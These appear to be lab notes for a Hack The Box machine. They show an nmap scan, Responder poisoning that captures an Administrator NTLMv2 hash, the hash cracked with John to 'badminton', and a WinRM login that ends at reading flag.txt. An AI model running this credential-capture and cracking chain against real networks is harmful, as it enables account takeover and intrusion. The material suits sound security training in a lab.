IP = 10.129.95.234

Related to: Windows, SAMBA, Enumeration, Apache, WinRM, Local File Inclusion, Remote File Inclusion, Password Cracking

NMAP Report
-----------------
nmap -v -p- --min-rate 5000 -sV -sC 10.129.95.234

Nmap scan report for 10.129.95.234
Host is up (0.084s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open  pando-pub?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

#
echo "10.129.95.234 unika.htb" | sudo tee -a /etc/hosts

#Install Responder
git clone https://github.com/lgandx/Responder.git

sudo python3 Responder.py -I tun0
[sudo] password for kali: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.1.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.42]
    Responder IPv6             [dead:beef:4::1028]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-XU9ZWCA4MPI]
    Responder Domain Name      [I88L.LOCAL]
    Responder DCE-RPC Port     [46200]

[+] Listening for events...                                                                   

[SMB] NTLMv2-SSP Client   : ::ffff:10.129.95.234
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:ed28dd1822cc0bfa:3730AE50F8DE8E2E7F9EAA8371E906BD:010100000
0000000003DB9CC7D4ED801A6DA150D3F28CE5900000000020008004900380038004C0001001E00570049004E002D005800550039005A005
7004300410034004D005000490004003400570049004E002D005800550039005A0057004300410034004D00500049002E004900380038004
C002E004C004F00430041004C00030014004900380038004C002E004C004F00430041004C00050014004900380038004C002E004C004F004
30041004C0007000800003DB9CC7D4ED8010600040002000000080030003000000000000000010000000020000087A631968D055D2D0E4DD
CFB71D47EA7DA61D947B15C7CBCEB2889D32C89C7FA0A001000000000000000000000000000000000000900200063006900660073002F003
10030002E00310030002E00310036002E00340032000000000000000000 


echo "Administrator::RESPONDER:ed28dd1822cc0bfa:3730AE50F8DE8E2E7F9EAA8371E906BD:0101000000000000003DB9CC7D4ED801
A6DA150D3F28CE5900000000020008004900380038004C0001001E00570049004E002D005800550039005A0057004300410034004D0050004
90004003400570049004E002D005800550039005A0057004300410034004D00500049002E004900380038004C002E004C004F00430041004C
00030014004900380038004C002E004C004F00430041004C00050014004900380038004C002E004C004F00430041004C0007000800003DB9C
C7D4ED8010600040002000000080030003000000000000000010000000020000087A631968D055D2D0E4DDCFB71D47EA7DA61D947B15C7CBC
EB2889D32C89C7FA0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E0031003
6002E00340032000000000000000000" > hash.txt

john -w=/usr/share/wordlists/rockyou.txt hash.txt   
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton        (Administrator)     
1g 0:00:00:00 DONE (2022-04-12 16:53) 100.0g/s 409600p/s 409600c/s 409600C/s slimshady..oooooo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.


evil-winrm -i 10.129.136.91 -u administrator -p badminton 

*Evil-WinRM* PS C:\Users\mike\Desktop> ls


    Directory: C:\Users\mike\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/10/2022   4:50 AM             32 flag.txt


*Evil-WinRM* PS C:\Users\mike\Desktop> cat flag.txt
